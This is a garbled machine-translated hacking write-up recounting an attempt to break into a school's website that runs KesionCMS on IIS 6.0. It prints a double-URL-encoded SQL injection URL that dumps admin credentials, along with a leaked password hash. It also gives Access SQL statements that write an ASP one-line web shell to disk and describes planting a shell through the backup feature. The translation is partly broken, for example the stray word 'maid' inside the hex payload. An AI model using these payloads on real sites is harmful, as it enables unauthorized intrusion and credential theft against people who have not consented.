The cause is very simple. Why did I receive this message in my QQ mailbox subscription?
After 00, Bai fumei said, '''why is there no object in the 90 s '''
They opened the school.
XX lab school... (We are in the spirit of learning, the whole process of code .)
Baidu zhi''
The website is www. ****. cn
IIS/6.0
The website generates static pages...
Let's look at the background ....
The background was changed by a CMS... So what is this CMS ???
This is coxun's CMS... We know what ??? Because
Adding 8 in the website background will show the original face '''
Now that we know it's coxun, we can make better use of it.
Baidu kexun Vulnerability
Vulnerabilities submitted by wooyun
Haha RP
Submission time:
Public Date:
Specific: http://www.bkjia.com/Article/201207/139333.html
Injection statement: % ') union select 1, 2, username +' | '+ password from KS_Admin
The conversion is as follows:
/Plus/ajaxs. asp? Action = GetRelativeItem & key = search % 2525% 2527% 2529% 2520% 2575% 256e % 2569% 256f % 256e % 2520% 2573% 2565% 256c % 2565% 2563% 2574% 2520% 2531% 252c % 2532% 252c % 2575% 2573% 2565% 2572% 256e % 2561% 256d % 2565% 252b % 2527% 257c % 2527% 252b % 2570% 2561% 2573% 2573% 256f % 2577% 2572% 2564% 2520% 2566% 2572% 256f % 256d % 2520% 254b % 2553% 255f % 2541% 256d % 2564% maid % 2500
You can use this code to manage accounts and passwords.
This shows how to perform transcoding, but some people may not know how to perform transcoding ....
In fact, this is a second Transcoding
First Transcoding
% 75% 6E % 69% 6F % 6E after Union Transcoding
Second Transcoding
We use the URLENconde encoding of gb2313 for second transcoding.
% 75% 6E % 69% 6F % 6E % 2575% 256E % 2569% 256F % 256E after Transcoding
In this way, you should understand how to switch back and forth ~
Now we have the account password, but we do not have the authentication code.
<Option value = '1 | 2'> admin | 8ae2232b1cd2bd90 </option>
The authentication code is saved in the Conn. asp file.
We only need to know this file.
That is to say, it is still not possible to have an account password.
Bytes ----------------------------------------------------------------------------------------
Registration is disabled for the website.
A bbs forbidden to register
With BBS background
By Dvbbs.net
Internet forums...
Ah ah
The Administrator also restricts the download prevention. mdb suffix.
It seems that the Administrator is aware of the management...
The main site is waiting for a long time ''''
Remember the address we just found?
Why didn't you want to start from this place?
Dumb
All you understand by default
Let's see what we see...
We went in.
Now shell is used.
There is no drama to directly launch the project.
Because all the stations on this server are smart, you know it!
8.0 using shell is an SQL statement
Normally
Run the Code:
1. create table cmd (a varchar (50 ))
2. insert into cmd (a) values ('<% execute request (chr (35) %> ')
3. select * into [a] in 'd: \ wwwroot \ m3loee.asa).xls ''excel 4.0;' from cmd;
4. drop table cmd;
Explanation:
1. create table cmd (a varchar (50) create a table with a field a named cmd field type with a length of 50 characters
2. insert into cmd (a) values ('<% execute request (chr (35) %>') insert a statement Trojan with the password # in field a of table cmd
3. select * into [a] in 'd: \ wwwroot \ m3loee.asa).xls ''excel 4.0;' from cmd exports the contents of the cmd table to an excel file in the physical path, why excel files are used, because ACCESS databases cannot export other dangerous formats. After exporting to excel, we can use the IIS Parsing Vulnerability to become our pony.
4. drop table cmd Delete table
But execute to the third sentence... Problem Found
We are dead.
Another one is simpler.
SELECT '<% execute request ("a") %>' into [0 ldgui] in 'd: \ wwwroot \ ***** \ wwwroot \ 8 + 1.asp( 1.asp) 'excel 8.0; 'from 0 ldgui
The following database is read-only.
Error Code |
Source |
Description |
Help |
Help documentation |
-2147217911 |
Cannot be updated. The database or object is read-only. |
Microsoft JET Database Engine |
5003027 |
|
It seems that shell cannot be used in the background.
Even if we get the authentication code of the target station, we cannot get shell in the background.
No permission can be raised by the bypass.
Full path of the primary database: D: \ wwwroot \ *** \ wwwroot \ 8 \ KS_Data \ KesionCMS8.mdb
The complete path of the collection database is D: \ wwwroot \ *** \ wwwroot \ KS_Data \ Collect \ KS_Collect.Mdb.
90sec scalpers may be able to exploit a scientific vulnerability.
However, the PHP environment is not installed on the local machine.
We have to note that...
There will be hope for one of the 134 sites ....
Let's talk about the process of getting shell in the background.
There is a backup in the background, but one thing is that there is no upload.
How can I get a picture without upload?
No database. It turns out to be asp.
We add an encrypted sentence in the background.
Back up the website
In this way
However, website permissions are very dead and there is no way
There is no way for the website to be uploaded
The upload Trojan prompts firewall Interception
The side-by-side message is dead.
The website data permission is read-only. I guess we cannot get the authentication code in time to get the shell.